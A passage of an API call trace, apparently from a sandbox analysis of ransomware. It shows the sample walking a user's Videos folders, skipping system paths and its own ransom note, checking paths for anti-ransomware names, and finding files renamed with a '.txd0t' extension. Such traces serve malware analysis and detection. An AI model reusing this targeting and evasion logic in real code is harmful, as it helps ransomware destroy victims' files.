(lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="cryptolocker") returned 0x0 [0090.321] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="ransomware") returned 0x0 [0090.321] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="C:\\WINDOWS") returned 0x0 [0090.321] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.321] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="C:\\Program Files") returned 0x0 [0090.321] GetProcessHeap () returned 0xe30000 [0090.321] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d4) returned 0xec7f28 [0090.321] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0090.321] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\*", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\*" [0090.321] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\*", lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a87a300, ftCreationTime.dwHighDateTime=0x1d5ee11, ftLastAccessTime.dwLowDateTime=0x5303514a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5303514a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0090.321] StrCmpW (psz1=".", psz2=".") returned 0 [0090.321] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a87a300, ftCreationTime.dwHighDateTime=0x1d5ee11, ftLastAccessTime.dwLowDateTime=0x5303514a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5303514a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.321] StrCmpW (psz1="..", psz2=".") returned 1 [0090.321] StrCmpW (psz1="..", psz2="..") returned 0 [0090.321] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52eb798f, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x52eb798f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52eb798f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.321] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.321] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.321] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0090.321] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0090.321] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt" [0090.321] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.321] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.322] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x140c5800, ftCreationTime.dwHighDateTime=0x1d5e444, ftLastAccessTime.dwLowDateTime=0x52e91693, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e91693, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="0ll0qUCYfiYHKHKER R", cAlternateFileName="0LL0QU~1")) returned 1 [0090.322] StrCmpW (psz1="0ll0qUCYfiYHKHKER R", psz2=".") returned 1 [0090.322] StrCmpW (psz1="0ll0qUCYfiYHKHKER R", psz2="..") returned 1 [0090.322] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0090.322] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0090.322] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="0ll0qUCYfiYHKHKER R", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0090.322] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\windows\\system32\\") returned 0x0 [0090.322] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.322] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\windows\\system\\") returned 0x0 [0090.322] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.322] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.322] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\appdata\\local\\") returned 0x0 [0090.322] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.322] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.322] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.322] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\boot\\") returned 0x0 [0090.322] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\perflogs\\") returned 0x0 [0090.322] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\programdata\\") returned 0x0 [0090.323] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\drivers\\") returned 0x0 [0090.323] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\wsus\\") returned 0x0 [0090.323] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.323] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.323] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="crypt_detect") returned 0x0 [0090.323] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="cryptolocker") returned 0x0 [0090.323] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="ransomware") returned 0x0 [0090.323] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="C:\\WINDOWS") returned 0x0 [0090.323] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.323] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="C:\\Program Files") returned 0x0 [0090.323] GetProcessHeap () returned 0xe30000 [0090.323] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4fc) returned 0xecbb70 [0090.323] StrCpyNW (in: psz1=0xecbb70, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0090.323] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\*", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\*" [0090.323] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\*", lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x140c5800, ftCreationTime.dwHighDateTime=0x1d5e444, ftLastAccessTime.dwLowDateTime=0x52e91693, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e91693, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2730 [0090.323] StrCmpW (psz1=".", psz2=".") returned 0 [0090.323] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x140c5800, ftCreationTime.dwHighDateTime=0x1d5e444, ftLastAccessTime.dwLowDateTime=0x52e91693, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e91693, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.323] StrCmpW (psz1="..", psz2=".") returned 1 [0090.323] StrCmpW (psz1="..", psz2="..") returned 0 [0090.323] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52e6b586, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x52e6b586, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e6b586, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.323] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.323] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.323] StrCpyNW (in: psz1=0xecbb70, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0090.323] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\" [0090.323] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\!TXDOT_READ_ME!.txt" [0090.323] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.323] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.323] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.324] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.324] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.324] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.324] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.324] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.324] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.324] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.324] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.324] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.324] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.324] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.324] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.324] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.324] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8012ea60, ftCreationTime.dwHighDateTime=0x1d5efb5, ftLastAccessTime.dwLowDateTime=0x9eab00a0, ftLastAccessTime.dwHighDateTime=0x1d5f0ed, ftLastWriteTime.dwLowDateTime=0x52e6b586, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4ca7, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="JifxRs4kGA26s8ZB.swf.txd0t", cAlternateFileName="JIFXRS~1.TXD")) returned 1 [0090.324] StrCmpW (psz1="JifxRs4kGA26s8ZB.swf.txd0t", psz2=".") returned 1 [0090.324] StrCmpW (psz1="JifxRs4kGA26s8ZB.swf.txd0t", psz2="..") returned 1 [0090.324] StrCpyNW (in: psz1=0xecbb70, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0090.324] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\" [0090.324] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\", psz2="JifxRs4kGA26s8ZB.swf.txd0t", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf.txd0t" [0090.324] PathFindExtensionW (pszPath="JifxRs4kGA26s8ZB.swf.txd0t") returned=".txd0t" [0090.324] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.324] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34842840, ftCreationTime.dwHighDateTime=0x1d5f094, ftLastAccessTime.dwLowDateTime=0xa69c2fe0, ftLastAccessTime.dwHighDateTime=0x1d5e25c, ftLastWriteTime.dwLowDateTime=0x52e91693, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xe756, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="smX5XObO64h XQO8UV.avi.txd0t", cAlternateFileName="SMX5XO~1.TXD")) returned 1 [0090.324] StrCmpW (psz1="smX5XObO64h XQO8UV.avi.txd0t", psz2=".") returned 1 [0090.324] StrCmpW (psz1="smX5XObO64h XQO8UV.avi.txd0t", psz2="..") returned 1 [0090.324] StrCpyNW (in: psz1=0xecbb70, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0090.324] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\" [0090.324] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\", psz2="smX5XObO64h XQO8UV.avi.txd0t", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi.txd0t" [0090.324] PathFindExtensionW (pszPath="smX5XObO64h XQO8UV.avi.txd0t") returned=".txd0t" [0090.324] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.324] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e2e620, ftCreationTime.dwHighDateTime=0x1d5ef5d, ftLastAccessTime.dwLowDateTime=0x9f718290, ftLastAccessTime.dwHighDateTime=0x1d5f0b9, ftLastWriteTime.dwLowDateTime=0x52e91693, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1f4f, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="vH3psvYnWA.swf.txd0t", cAlternateFileName="VH3PSV~1.TXD")) returned 1 [0090.324] StrCmpW (psz1="vH3psvYnWA.swf.txd0t", psz2=".") returned 1 [0090.324] StrCmpW (psz1="vH3psvYnWA.swf.txd0t", psz2="..") returned 1 [0090.324] StrCpyNW (in: psz1=0xecbb70, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0090.324] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\" [0090.324] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\", psz2="vH3psvYnWA.swf.txd0t", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf.txd0t" [0090.325] PathFindExtensionW (pszPath="vH3psvYnWA.swf.txd0t") returned=".txd0t" [0090.325] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.325] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e2e620, ftCreationTime.dwHighDateTime=0x1d5ef5d, ftLastAccessTime.dwLowDateTime=0x9f718290, ftLastAccessTime.dwHighDateTime=0x1d5f0b9, ftLastWriteTime.dwLowDateTime=0x52e91693, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1f4f, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="vH3psvYnWA.swf.txd0t", cAlternateFileName="VH3PSV~1.TXD")) returned 0 [0090.325] FindClose (in: hFindFile=0xec2730 | out: hFindFile=0xec2730) returned 1 [0090.325] GetProcessHeap () returned 0xe30000 [0090.325] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecbb70 | out: hHeap=0xe30000) returned 1 [0090.325] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7319f60, ftCreationTime.dwHighDateTime=0x1d5e637, ftLastAccessTime.dwLowDateTime=0xdafb33b0, ftLastAccessTime.dwHighDateTime=0x1d5ef47, ftLastWriteTime.dwLowDateTime=0x52eb798f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x136ed, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="0qq-2JELVv.avi.txd0t", cAlternateFileName="0QQ-2J~1.TXD")) returned 1 [0090.325] StrCmpW (psz1="0qq-2JELVv.avi.txd0t", psz2=".") returned 1 [0090.325] StrCmpW (psz1="0qq-2JELVv.avi.txd0t", psz2="..") returned 1 [0090.325] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0090.325] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0090.325] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="0qq-2JELVv.avi.txd0t", cchMax=1108 | out: 